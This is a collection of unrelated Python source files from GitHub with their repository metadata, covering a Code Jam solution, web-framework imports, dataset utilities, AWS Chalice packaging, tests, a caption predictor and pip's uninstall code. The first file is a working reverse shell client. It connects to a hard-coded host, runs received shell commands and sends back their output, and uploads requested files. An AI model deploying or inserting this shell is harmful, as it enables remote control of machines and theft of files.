571ebcf06cc01309231a97a963f531f8dd90963d
|
/Hacking Scripts/reverseShellClient.py
|
8d0e051c123e16c061dada96f83f7e7f1da281dc
|
[] |
no_license
|
SV-ZeroOne/Python-Projects
|
3da0ec813e2764d5a3cd8f1d9825e698e368a84e
|
8820c346e0dde3b4023ce400cb722d08c1b4c52e
|
refs/heads/master
| 2023-08-19T20:43:07.294205
| 2021-10-16T11:57:33
| 2021-10-16T11:57:33
| 95,302,475
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 804
|
py
|
import socket
import subprocess
import os
def transfer(s, path):
    if os.path.exists(path):
        with open(path, 'rb') as f:  # context manager ensures the file is closed
            packet = f.read(1024)
            while len(packet) > 0:
                s.send(packet)
                packet = f.read(1024)
        s.send('DONE'.encode())
    else:
        s.send('File not found'.encode())
def connect():
s = socket.socket()
s.connect(("192.168.100.137",8080))
while True:
command = s.recv(1024)
if 'terminate' in command.decode():
s.close()
break
elif 'grab' in command.decode():
grab, path = command.decode().split("*")
try:
transfer(s, path)
except:
pass
else:
CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(CMD.stdout.read())
s.send(CMD.stderr.read())
def main():
connect()
main()
|
[
"steve@elitehost.co.za"
] |
steve@elitehost.co.za
|
5fef595807aff3c1ec3c72433953ec333d323341
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_4/75.py
|
8d4a612aa342b0b8858f654fcd10500e495a8f9b
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
import sys
f = open(sys.argv[1])
o = open(sys.argv[1].split('.')[0] + '.out', 'w')
nCases = int(f.readline().strip())
for case in range(nCases):
dimension = int(f.readline())
v1 = map(int, f.readline().strip().split())
v2 = map(int, f.readline().strip().split())
v1.sort()
v2.sort()
v2.reverse()
sum = 0
for x,y in zip(v1, v2):
sum += x*y
o.write('Case #%d: %d\n' % (case + 1, sum))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
bc291688aa3ce741509d6240563d380a29e2dd1a
|
62d6a37e1fb1b224b53e14a1cf151ef0571aa20f
|
/orun/http/__init__.py
|
5d27eb7d2410dda8fe4263aa9eb1974206200fbe
|
[] |
no_license
|
katrid/orun
|
4fa0f291a1ef43f16bc1857a170fc0b2e5e06739
|
bfc6dae06182124ba75b1f3761d81ba8ca387dea
|
refs/heads/master
| 2023-08-30T03:58:34.570527
| 2023-08-09T04:05:30
| 2023-08-09T04:05:30
| 66,562,767
| 14
| 4
| null | 2023-01-06T22:29:37
| 2016-08-25T14:01:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
from orun.http.cookie import SimpleCookie, parse_cookie
from orun.http.request import (
HttpRequest, QueryDict, RawPostDataException, UnreadablePostError,
)
from orun.http.response import (
BadHeaderError, FileResponse, Http404, HttpResponse,
HttpResponseBadRequest, HttpResponseForbidden, HttpResponseGone,
HttpResponseNotAllowed, HttpResponseNotFound, HttpResponseNotModified,
HttpResponsePermanentRedirect, HttpResponseRedirect,
HttpResponseServerError, JsonResponse, StreamingHttpResponse,
)
__all__ = [
'SimpleCookie', 'parse_cookie', 'HttpRequest', 'QueryDict',
'RawPostDataException', 'UnreadablePostError',
'HttpResponse', 'StreamingHttpResponse', 'HttpResponseRedirect',
'HttpResponsePermanentRedirect', 'HttpResponseNotModified',
'HttpResponseBadRequest', 'HttpResponseForbidden', 'HttpResponseNotFound',
'HttpResponseNotAllowed', 'HttpResponseGone', 'HttpResponseServerError',
'Http404', 'BadHeaderError', 'JsonResponse', 'FileResponse',
]
|
[
"alexandre@katrid.com"
] |
alexandre@katrid.com
|
2f2e173cedfb3e0b03918438536ae26ad4faaab9
|
2ca998dd8361984c4d4312f80b0c4ff67fcc84f4
|
/mid2names.py
|
24c72dac715ed35ecb5f14d4fefbc984ac4b12ae
|
[] |
no_license
|
rohitpatwa/dbExtend
|
31a7f1935d240595bc10f3d3641c7d051abf2047
|
dad7de67141edc3d7353c5f1762a8786b9e3b997
|
refs/heads/master
| 2022-03-31T04:16:06.719265
| 2020-01-22T23:28:20
| 2020-01-22T23:28:20
| 235,421,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,794
|
py
|
"""Create LUT from a given db
Script to create a LUT table with FID.MID as the keys and English names as values. The script assumes the file structure
to be F0001/MID1 for all FIDs. It then reads all the mid.csv files in the MID? folders and append them to a dataframe.
The purpose of this script is to prepare FIW for finding overlapping names across other datasets.
"""
import glob
import re
from tqdm import tqdm
import pandas as pd
def clean_name(name):
""" Cleans a given input name.
Args:
name: input name
Returns:
cleaned name
"""
# TODO: implement this method
pass
def import_fiw_names(path):
""" Create a LUT from all the names of the db
Args:
path: Path to the folder containing FIDs
Returns:
Saves a file with the name FIW_LUT.csv.
Returns dataframe of FIW_LUT
"""
# make sure the path ends with a '/'
if not re.search(r'\/$', path):
path += '/'
# read all the paths matching the given format
paths = sorted(glob.glob(path + 'F????/mid.csv'))
df = pd.DataFrame(
columns=['source_db', 'fid', 'mid', 'gender', 'first', 'first_alias', 'last', 'last_alias', 'name'])
# Read a csv file which contains last names of all the FIDs
last_name_file_path = '/'.join(path.split('/')[:-2]) + '/FIW_FIDs.csv'
last_name_df = pd.read_csv(last_name_file_path)
for p in tqdm(paths):
# Extract fid from path
fid = re.sub(r'.*(F\d{4}).*', r'\1', p)
d = pd.read_csv(p)
# this check is applied because a few families are missing in last_name_df. it will be fixed in future
if fid in last_name_df['fid'].values:
last = last_name_df.query('fid==@fid').iloc[0]['surname'].split('.')[0]
else:
last = ''
# TODO: Develop a way to get aliases
for i in d.index:
first, mid, gender = d.loc[i, ['Name', 'MID', 'Gender']]
first_alias = '' # alias
last_alias = '' # to be fetched
name = ' '.join([first, last]).strip()
df.loc[len(df)] = ['FIW', fid, mid, gender, first, first_alias, last, last_alias, name.lower()]
df.to_csv('FIW_LUT.csv', index=False)
return df
def import_family101_names(path):
"""Create a LUT for Family101 db
Args:
path: path to the FAMILY101.txt file
Returns:
Saves a file with the name Family101_LUT.csv.
returns a dataframe with all the names from family101 db
"""
# open the file containing family101 names
f = open(path)
df = pd.DataFrame(columns=['source_db', 'name', 'gender', 'relation', 'first', 'last', 'family_name'])
for row in tqdm(f.readlines()):
row = re.sub(r'\n', '', row)
if row:
# Each row has a structure "1 HUSB Barac_Obama"
row_split = row.split()
relation, name = row_split[1], row_split[2].replace('_', ' ')
# These rows are not of any use, they just mention the family surname
if relation == 'FAMI':
family_name = name
else:
name_split = name.split()
first, last = '', ''
if len(name_split) > 1:
first, last = name_split[0], name_split[-1]
# There are only 4 relations ["HUSB", "WIFE", "SONN", "DAUG"]
if relation == 'HUSB' or relation == 'SONN':
gender = 'm'
else:
gender = 'f'
df.loc[len(df)] = 'family101', name.lower(), gender, relation, first, last, family_name
df.to_csv('Family101_LUT.csv', index=False)
return df
# Testing code
import sys
if __name__ == "__main__":
p = sys.argv[1]
import_fiw_names(p)
import_family101_names(p)
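# Possible follow-up (added sketch, not part of this script): both LUTs share
# a lower-cased 'name' column, so overlapping names across the two datasets
# could be found with a pandas merge:
#     fiw = import_fiw_names(p)
#     fam101 = import_family101_names(p)
#     overlap = fiw.merge(fam101, on='name')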
|
[
"rohitpatwa@gmail.com"
] |
rohitpatwa@gmail.com
|
3784205655c4e6b4cfa9c7dfccd811231c871938
|
ac15eda44e8dcfee6dff62f514c5b98a3382f50d
|
/python/les5/les5_3.py
|
f7632dd52e6ce6a4948be0711a402c746542fd4a
|
[] |
no_license
|
yangruihan/raspberrypi
|
5789c1a2e72d4012d46563d0644b08d032d346e6
|
22bc1a06b25e129a4314f4bc9cec5112affda136
|
refs/heads/master
| 2022-12-27T09:27:05.102020
| 2020-10-13T09:41:24
| 2020-10-13T09:41:24
| 32,977,936
| 4
| 0
| null | 2022-12-16T01:47:53
| 2015-03-27T09:30:43
|
Java
|
UTF-8
|
Python
| false
| false
| 232
|
py
|
#!/usr/bin/env python3
import pickle
with open('mydata.pickle', 'wb') as mysavedata:
pickle.dump([1, 2, 'three'], mysavedata)
with open('mydata.pickle', 'rb') as myrestoredata:
a_list = pickle.load(myrestoredata)
print(a_list)
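# Expected output: [1, 2, 'three'] (the list survives the pickle round trip)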
|
[
"yangruihan@vip.qq.com"
] |
yangruihan@vip.qq.com
|
8b51fa52d6cef1d961cb8e29185932c1f2371400
|
a95a398f7f1e4306367f22ff59a9da72a8c23b46
|
/course-files/lectures/lecture_04/07_activity.py
|
c4bf8d853793765bb768a13eb6186ba70431a59a
|
[] |
no_license
|
eecs110/spring2020
|
74ff8a317cf009aa727ad46e143e1c6619c83086
|
a726d32c5eb418f4bf0fe27fae1f6479e4ae8140
|
refs/heads/master
| 2022-10-18T21:58:19.690897
| 2020-06-03T01:04:20
| 2020-06-03T01:04:20
| 251,242,896
| 0
| 0
| null | 2022-10-06T10:22:24
| 2020-03-30T08:17:53
|
Python
|
UTF-8
|
Python
| false
| false
| 445
|
py
|
from operator import add, mul, sub, truediv, mod, floordiv, pow
# for more info, see the docs: https://docs.python.org/3/library/operator.html
# Challenge: Create a custom function called "hypotenuse" that calculates
# the hypotenuse of any triangle. Then, invoke that function using the
# following triangle dimensions:
# triangle 1: side_a = 5, side_b = 12
# triangle 2: side_a = 3, side_b = 5
# triangle 3: side_a = 4, side_b = 4
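# One possible solution (a sketch, not part of the original activity file);
# it builds the hypotenuse from the imported operator functions:
# hypotenuse(a, b) = (a^2 + b^2) ** 0.5
def hypotenuse(side_a, side_b):
    """Return the hypotenuse of a right triangle with legs side_a and side_b."""
    return pow(add(pow(side_a, 2), pow(side_b, 2)), 0.5)
print(hypotenuse(5, 12))  # triangle 1 -> 13.0
print(hypotenuse(3, 5))   # triangle 2 -> ~5.83095
print(hypotenuse(4, 4))   # triangle 3 -> ~5.65685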
|
[
"vanwars@gmail.com"
] |
vanwars@gmail.com
|
07d6d0d03eb9241e5ed49723bdf77dc4844cac19
|
d07f4cd12b40fb4e009b4e36c4d8c0b42b35768d
|
/chalice/package.py
|
642f4878836bd056bc1932395c3295c4d75224c8
|
[
"Apache-2.0"
] |
permissive
|
birkoff/chalice
|
b865d17d085dc92842da09d82033411001a2e01c
|
83ffea3773519a26bf1c72ef48b33c149ccdcc2f
|
refs/heads/master
| 2021-01-21T20:56:46.260466
| 2017-05-23T17:03:40
| 2017-05-23T17:03:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,897
|
py
|
import os
import copy
import json
import hashlib
from typing import Any, Dict # noqa
from chalice import __version__ as chalice_version
from chalice.deploy.swagger import CFNSwaggerGenerator
from chalice.deploy.swagger import SwaggerGenerator # noqa
from chalice.deploy.packager import LambdaDeploymentPackager
from chalice.deploy.deployer import ApplicationPolicyHandler
from chalice.utils import OSUtils
from chalice.config import Config # noqa
from chalice.app import Chalice # noqa
from chalice.policy import AppPolicyGenerator
def create_app_packager(config):
# type: (Config) -> AppPackager
osutils = OSUtils()
# The config object does not handle a default value
# for autogen'ing a policy so we need to handle this here.
return AppPackager(
# We're adding placeholder values that will be filled in once the
# lambda function is deployed.
SAMTemplateGenerator(
CFNSwaggerGenerator('{region}', '{lambda_arn}'),
PreconfiguredPolicyGenerator(
config,
ApplicationPolicyHandler(
osutils, AppPolicyGenerator(osutils)))),
LambdaDeploymentPackager()
)
class PreconfiguredPolicyGenerator(object):
def __init__(self, config, policy_gen):
# type: (Config, ApplicationPolicyHandler) -> None
self._config = config
self._policy_gen = policy_gen
def generate_policy_from_app_source(self):
# type: () -> Dict[str, Any]
return self._policy_gen.generate_policy_from_app_source(
self._config)
class SAMTemplateGenerator(object):
_BASE_TEMPLATE = {
'AWSTemplateFormatVersion': '2010-09-09',
'Transform': 'AWS::Serverless-2016-10-31',
'Outputs': {
'RestAPIId': {
'Value': {'Ref': 'RestAPI'},
},
'APIHandlerName': {
'Value': {'Ref': 'APIHandler'},
},
'APIHandlerArn': {
'Value': {'Fn::GetAtt': ['APIHandler', 'Arn']}
},
'EndpointURL': {
'Value': {
'Fn::Sub': (
'https://${RestAPI}.execute-api.${AWS::Region}'
# The api_gateway_stage is filled in when
# the template is built.
'.amazonaws.com/%s/'
)
}
}
}
} # type: Dict[str, Any]
def __init__(self, swagger_generator, policy_generator):
# type: (SwaggerGenerator, PreconfiguredPolicyGenerator) -> None
self._swagger_generator = swagger_generator
self._policy_generator = policy_generator
def generate_sam_template(self, config, code_uri='<placeholder>'):
# type: (Config, str) -> Dict[str, Any]
template = copy.deepcopy(self._BASE_TEMPLATE)
resources = {
'APIHandler': self._generate_serverless_function(config, code_uri),
'RestAPI': self._generate_rest_api(
config.chalice_app, config.api_gateway_stage),
}
template['Resources'] = resources
self._update_endpoint_url_output(template, config)
return template
def _update_endpoint_url_output(self, template, config):
# type: (Dict[str, Any], Config) -> None
url = template['Outputs']['EndpointURL']['Value']['Fn::Sub']
template['Outputs']['EndpointURL']['Value']['Fn::Sub'] = (
url % config.api_gateway_stage)
def _generate_serverless_function(self, config, code_uri):
# type: (Config, str) -> Dict[str, Any]
properties = {
'Runtime': config.lambda_python_version,
'Handler': 'app.app',
'CodeUri': code_uri,
'Events': self._generate_function_events(config.chalice_app),
'Policies': [self._generate_iam_policy()],
'Tags': self._function_tags(config),
}
if config.environment_variables:
properties['Environment'] = {
'Variables': config.environment_variables
}
return {
'Type': 'AWS::Serverless::Function',
'Properties': properties,
}
def _function_tags(self, config):
# type: (Config) -> Dict[str, str]
tag = 'version=%s:stage=%s:app=%s' % (chalice_version,
config.chalice_stage,
config.app_name)
return {'aws-chalice': tag}
def _generate_function_events(self, app):
# type: (Chalice) -> Dict[str, Any]
events = {}
for _, view in app.routes.items():
for http_method in view.methods:
key_name = ''.join([
view.view_name, http_method.lower(),
hashlib.md5(
view.view_name.encode('utf-8')).hexdigest()[:4],
])
events[key_name] = {
'Type': 'Api',
'Properties': {
'Path': view.uri_pattern,
'RestApiId': {'Ref': 'RestAPI'},
'Method': http_method.lower(),
}
}
return events
def _generate_rest_api(self, app, api_gateway_stage):
# type: (Chalice, str) -> Dict[str, Any]
swagger_definition = self._swagger_generator.generate_swagger(app)
properties = {
'StageName': api_gateway_stage,
'DefinitionBody': swagger_definition,
}
return {
'Type': 'AWS::Serverless::Api',
'Properties': properties,
}
def _generate_iam_policy(self):
# type: () -> Dict[str, Any]
return self._policy_generator.generate_policy_from_app_source()
class AppPackager(object):
def __init__(self,
sam_templater, # type: SAMTemplateGenerator
lambda_packager, # type: LambdaDeploymentPackager
):
# type: (...) -> None
self._sam_templater = sam_templater
self._lambda_packager = lambda_packager
def _to_json(self, doc):
# type: (Any) -> str
return json.dumps(doc, indent=2, separators=(',', ': '))
def package_app(self, config, outdir):
# type: (Config, str) -> None
# Deployment package
zip_file = os.path.join(outdir, 'deployment.zip')
self._lambda_packager.create_deployment_package(
config.project_dir, zip_file)
# SAM template
sam_template = self._sam_templater.generate_sam_template(
config, './deployment.zip')
if not os.path.isdir(outdir):
os.makedirs(outdir)
with open(os.path.join(outdir, 'sam.json'), 'w') as f:
f.write(self._to_json(sam_template))
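# Usage sketch (added; `config` is a hypothetical chalice Config instance,
# mirroring how the chalice CLI drives this module):
#     packager = create_app_packager(config)
#     packager.package_app(config, outdir='packaged')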
|
[
"js@jamesls.com"
] |
js@jamesls.com
|
6a87563d50a56154d56a3e17b55a97e0d205ef9b
|
aa3dc5ae4fa7d531bbaa75c3008031f2a1b8845d
|
/1460. Make Two Arrays Equal by Reversing Sub-arrays.py
|
bf19eb4de403cc17d243c4a1a98166c93118834e
|
[] |
no_license
|
alankrit03/LeetCode_Solutions
|
354e797d1d5f5a78b116c1f9a3034dd651d71d9a
|
f8ca46afdfbd67509dde63e9cdc5fd178b6f111b
|
refs/heads/master
| 2021-01-08T17:41:22.976375
| 2020-11-03T17:01:37
| 2020-11-03T17:01:37
| 242,097,188
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
class Solution:
def canBeEqual(self, target, arr) -> bool:
from collections import Counter
return Counter(target) == Counter(arr)
|
[
"alankritagarwal9@gmail.com"
] |
alankritagarwal9@gmail.com
|
43f07e970a3ab93ee5c4e86d16c7fc72c4f5b1d9
|
64ff0d2b1f12c321e8fe44d0524bb444820b21f7
|
/test/test_parser_yaml.py
|
0c77dd18718c76c0ed43fed9d0a856c302417e4d
|
[
"BSD-2-Clause"
] |
permissive
|
Aniket-Pradhan/python-odml
|
8ffd460cd8560b03f439b46b85fc1c78292c6191
|
48e55a264e38829d90f3b8def37e4d2d7b39337f
|
refs/heads/master
| 2020-12-04T11:32:21.717225
| 2020-01-16T06:34:09
| 2020-01-16T16:59:29
| 231,748,290
| 0
| 0
|
NOASSERTION
| 2020-01-04T10:58:14
| 2020-01-04T10:58:14
| null |
UTF-8
|
Python
| false
| false
| 1,495
|
py
|
import os
import unittest
import yaml
from odml.tools import dict_parser
from odml.tools.parser_utils import ParserException, InvalidVersionException
class TestYAMLParser(unittest.TestCase):
def setUp(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.basepath = os.path.join(dir_path, "resources")
self.yaml_reader = dict_parser.DictReader()
def test_missing_root(self):
filename = "missing_root.yaml"
message = "Missing root element"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_missing_version(self):
filename = "missing_version.yaml"
message = "Could not find odml-version"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_invalid_version(self):
filename = "invalid_version.yaml"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(InvalidVersionException):
_ = self.yaml_reader.to_odml(parsed_doc)
|
[
"michael.p.sonntag@gmail.com"
] |
michael.p.sonntag@gmail.com
|
56c2fc2b809384b7692cba50dfc269fcf1af96cc
|
e6f1137903b9658e5e3c1ee51201a931894303b9
|
/deepiu/image_caption/algos/history/v1/show_and_tell_predictor.py
|
63ca6f464f3d5f17f6249c5f15a71bc02c5e91e1
|
[] |
no_license
|
fword/hasky
|
8ed69ef85bb34823d9ade27bb3b19aac02872440
|
d3c680ffa04f7487b931a5575977798157b42b7e
|
refs/heads/master
| 2021-01-23T01:18:49.275631
| 2017-03-18T13:01:27
| 2017-03-18T13:01:27
| 85,898,744
| 1
| 1
| null | 2017-03-23T02:39:06
| 2017-03-23T02:39:06
| null |
UTF-8
|
Python
| false
| false
| 4,840
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ==============================================================================
# \file show_and_tell_predictor.py
# \author chenghuige
# \date 2016-09-04 17:50:21.017234
# \Description
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
flags = tf.app.flags
FLAGS = flags.FLAGS
import numpy as np
import melt
import conf
from conf import IMAGE_FEATURE_LEN, TEXT_MAX_WORDS
import vocabulary
import text2ids
from text2ids import idslist2texts
import gezi
from algos.show_and_tell import ShowAndTell
class SeqDecodeMethod():
max_prob = 0
sample = 1
full_sample = 2
beam_search = 3
class ShowAndTellPredictor(ShowAndTell, melt.PredictorBase):
def __init__(self):
#super(ShowAndTellPredictor, self).__init__()
melt.PredictorBase.__init__(self)
ShowAndTell.__init__(self, False)
def init_predict_texts(self, decode_method=0, beam_size=5):
"""
init for generating texts
"""
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.texts = self.build_predict_texts_graph(self.image_feature_place, decode_method, beam_size)
def predict_texts(self, images):
feed_dict = {
self.image_feature_place: images,
}
vocab = vocabulary.get_vocab()
generated_words = self.sess.run(self.texts, feed_dict)
texts = idslist2texts(generated_words)
return texts
def init_predict(self):
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.text = tf.placeholder(tf.int64, [None, TEXT_MAX_WORDS])
self.loss = self.build_predict_graph(self.image_feature_place, self.text)
def predict(self, image, text):
"""
default usage: a single image and a single text predict one sim score
"""
feed_dict = {
self.image_feature_place: image.reshape([-1, IMAGE_FEATURE_LEN]),
self.text: text.reshape([-1, TEXT_MAX_WORDS]),
}
loss = self.sess.run(self.loss, feed_dict)
return loss
def bulk_predict(self, images, texts):
"""
input multiple images, multiple texts
output:
image0, text0_score, text1_score ...
image1, text0_score, text1_score ...
...
"""
scores = []
for image in images:
stacked_images = np.array([image] * len(texts))
score = self.predict(stacked_images, texts)
scores.append(score)
return np.array(scores)
def build_predict_texts_graph(self, image, decode_method=0, beam_size=5):
"""
@TODO beam search, early stop maybe need c++ op
"""
batch_size = tf.shape(image)[0]
image_emb = tf.matmul(image, self.encode_img_W) + self.encode_img_b
state = self.cell.zero_state(batch_size, tf.float32)
generated_words = []
max_words = TEXT_MAX_WORDS
with tf.variable_scope("RNN"):
(output, state) = self.cell(image_emb, state)
last_word = tf.nn.embedding_lookup(self.emb, tf.zeros([batch_size], tf.int32)) + self.bemb
#last_word = image_emb
for i in range(max_words):
#if i > 0: tf.get_variable_scope().reuse_variables()
tf.get_variable_scope().reuse_variables()
(output, state) = self.cell(last_word, state)
with tf.device('/cpu:0'):
logit_words = tf.matmul(output, self.embed_word_W) + self.embed_word_b
top_prob_words = None
if decode_method == SeqDecodeMethod.max_prob:
max_prob_word = tf.argmax(logit_words, 1)
elif decode_method == SeqDecodeMethod.sample:
max_prob_word = tf.nn.top_k(logit_words, beam_size)[1][:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.full_sample:
top_prob_words = tf.nn.top_k(logit_words, beam_size)[1]
max_prob_word = top_prob_words[:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.beam_search:
raise ValueError('beam search not implemented yet')
else:
raise ValueError('not supported decode method')
last_word = tf.nn.embedding_lookup(self.emb, max_prob_word) + self.bemb
max_prob_word = tf.reshape(max_prob_word, [batch_size, -1])
if top_prob_words is not None:
generated_words.append(top_prob_words)
else:
generated_words.append(max_prob_word)
generated_words = tf.concat(1, generated_words)
return generated_words
def build_predict_graph(self, image, text):
image = tf.reshape(image, [1, IMAGE_FEATURE_LEN])
text = tf.reshape(text, [1, TEXT_MAX_WORDS])
loss = self.build_graph(image, text, is_tranining=False)
return loss
|
[
"29109317@qq.com"
] |
29109317@qq.com
|
4e3d7ecbd55853ed72a0d64d4f743af1f873e7b8
|
ce4f1810b8011f05f4e9f8b67959b6a2994ac821
|
/GAVOCoverage/temp-python/lib/python2.7/site-packages/pip/req/req_uninstall.py
|
90a593628d08a707f6d3d9fc6c65406149bd8b5e
|
[] |
no_license
|
Hyradus/VO_QGIS3.x_plugin
|
b11d3b18e473861b6d0733c3783c40af6e8eb039
|
9ab9acb4756c415797b5a7e64389978a84a32c23
|
refs/heads/master
| 2022-04-14T00:25:12.283460
| 2020-04-02T17:18:50
| 2020-04-02T17:18:50
| 248,215,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,937
|
py
|
from __future__ import absolute_import
from builtins import object
import logging
import os
import tempfile
from pip.compat import uses_pycache, WINDOWS, cache_from_source
from pip.exceptions import UninstallationError
from pip.utils import rmtree, ask, is_local, renames, normalize_path
from pip.utils.logging import indent_log
logger = logging.getLogger(__name__)
class UninstallPathSet(object):
"""A set of file paths to be removed in the uninstallation of a
requirement."""
def __init__(self, dist):
self.paths = set()
self._refuse = set()
self.pth = {}
self.dist = dist
self.save_dir = None
self._moved_paths = []
def _permitted(self, path):
"""
Return True if the given path is one we are permitted to
remove/modify, False otherwise.
"""
return is_local(path)
def add(self, path):
head, tail = os.path.split(path)
# we normalize the head to resolve parent directory symlinks, but not
# the tail, since we only want to uninstall symlinks, not their targets
path = os.path.join(normalize_path(head), os.path.normcase(tail))
if not os.path.exists(path):
return
if self._permitted(path):
self.paths.add(path)
else:
self._refuse.add(path)
# __pycache__ files can show up after 'installed-files.txt' is created,
# due to imports
if os.path.splitext(path)[1] == '.py' and uses_pycache:
self.add(cache_from_source(path))
def add_pth(self, pth_file, entry):
pth_file = normalize_path(pth_file)
if self._permitted(pth_file):
if pth_file not in self.pth:
self.pth[pth_file] = UninstallPthEntries(pth_file)
self.pth[pth_file].add(entry)
else:
self._refuse.add(pth_file)
def compact(self, paths):
"""Compact a path set to contain the minimal number of paths
necessary to contain all paths in the set. If /a/path/ and
/a/path/to/a/file.txt are both in the set, leave only the
shorter path."""
short_paths = set()
for path in sorted(paths, key=len):
if not any([
(path.startswith(shortpath) and
path[len(shortpath.rstrip(os.path.sep))] == os.path.sep)
for shortpath in short_paths]):
short_paths.add(path)
return short_paths
def _stash(self, path):
return os.path.join(
self.save_dir, os.path.splitdrive(path)[1].lstrip(os.path.sep))
def remove(self, auto_confirm=False):
"""Remove paths in ``self.paths`` with confirmation (unless
``auto_confirm`` is True)."""
if not self.paths:
logger.info(
"Can't uninstall '%s'. No files were found to uninstall.",
self.dist.project_name,
)
return
logger.info(
'Uninstalling %s-%s:',
self.dist.project_name, self.dist.version
)
with indent_log():
paths = sorted(self.compact(self.paths))
if auto_confirm:
response = 'y'
else:
for path in paths:
logger.info(path)
response = ask('Proceed (y/n)? ', ('y', 'n'))
if self._refuse:
logger.info('Not removing or modifying (outside of prefix):')
for path in self.compact(self._refuse):
logger.info(path)
if response == 'y':
self.save_dir = tempfile.mkdtemp(suffix='-uninstall',
prefix='pip-')
for path in paths:
new_path = self._stash(path)
logger.debug('Removing file or directory %s', path)
self._moved_paths.append(path)
renames(path, new_path)
for pth in list(self.pth.values()):
pth.remove()
logger.info(
'Successfully uninstalled %s-%s',
self.dist.project_name, self.dist.version
)
def rollback(self):
"""Rollback the changes previously made by remove()."""
if self.save_dir is None:
logger.error(
"Can't roll back %s; was not uninstalled",
self.dist.project_name,
)
return False
logger.info('Rolling back uninstall of %s', self.dist.project_name)
for path in self._moved_paths:
tmp_path = self._stash(path)
logger.debug('Replacing %s', path)
renames(tmp_path, path)
for pth in list(self.pth.values()):
pth.rollback()
def commit(self):
"""Remove temporary save dir: rollback will no longer be possible."""
if self.save_dir is not None:
rmtree(self.save_dir)
self.save_dir = None
self._moved_paths = []
class UninstallPthEntries(object):
def __init__(self, pth_file):
if not os.path.isfile(pth_file):
raise UninstallationError(
"Cannot remove entries from nonexistent file %s" % pth_file
)
self.file = pth_file
self.entries = set()
self._saved_lines = None
def add(self, entry):
entry = os.path.normcase(entry)
# On Windows, os.path.normcase converts the entry to use
# backslashes. This is correct for entries that describe absolute
# paths outside of site-packages, but all the others use forward
# slashes.
if WINDOWS and not os.path.splitdrive(entry)[0]:
entry = entry.replace('\\', '/')
self.entries.add(entry)
def remove(self):
logger.debug('Removing pth entries from %s:', self.file)
with open(self.file, 'rb') as fh:
# windows uses '\r\n' with py3k, but uses '\n' with py2.x
lines = fh.readlines()
self._saved_lines = lines
if any(b'\r\n' in line for line in lines):
endline = '\r\n'
else:
endline = '\n'
for entry in self.entries:
try:
logger.debug('Removing entry: %s', entry)
lines.remove((entry + endline).encode("utf-8"))
except ValueError:
pass
with open(self.file, 'wb') as fh:
fh.writelines(lines)
def rollback(self):
if self._saved_lines is None:
logger.error(
'Cannot roll back changes to %s, none were made', self.file
)
return False
logger.debug('Rolling %s back to previous state', self.file)
with open(self.file, 'wb') as fh:
fh.writelines(self._saved_lines)
return True
|
[
"giacomo.nodjoumi@hyranet.info"
] |
giacomo.nodjoumi@hyranet.info
|
c5c52a34b30735cf8048a66d5858079d6df8527b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/vAk9SBqYmj6hXKfrD_16.py
|
a18522316d4af7072720d687cb474b1b2f6e58b9
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
"""
In this challenge, you have to implement a function that returns the given
distance `kilometers` converted into miles. You have to round the result up to
the fifth decimal digit.
### Examples
km_to_miles(2) ➞ 1.24274
km_to_miles(6) ➞ 3.72823
km_to_miles(8) ➞ 4.97097
### Notes
1 kilometer = 0.621371 miles.
"""
def km_to_miles(kilometers):
return round(kilometers * 0.621371, 5)
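# Sanity checks against the examples above (added; not part of the original solution):
assert km_to_miles(2) == 1.24274
assert km_to_miles(6) == 3.72823
assert km_to_miles(8) == 4.97097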
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
1955002f06ce2a8c4cb851a8219ebe39c214db28
|
8f0ee068dc5f78491812ee8fec4ecc4ad48be8b5
|
/search/search.py
|
fc18b93f5127bdc5849bdba83db82fd26f0fd190
|
[] |
no_license
|
russkingit/Pacman-project-Artificial-Intellengence-python
|
b36dc48b12f35082b6ac2aac4620d50dec9b3ddf
|
553618ed58de51a7c1d1eaa90fb0441dc9d8e34b
|
refs/heads/master
| 2020-04-20T02:27:31.226385
| 2019-02-01T05:03:40
| 2019-02-01T05:03:40
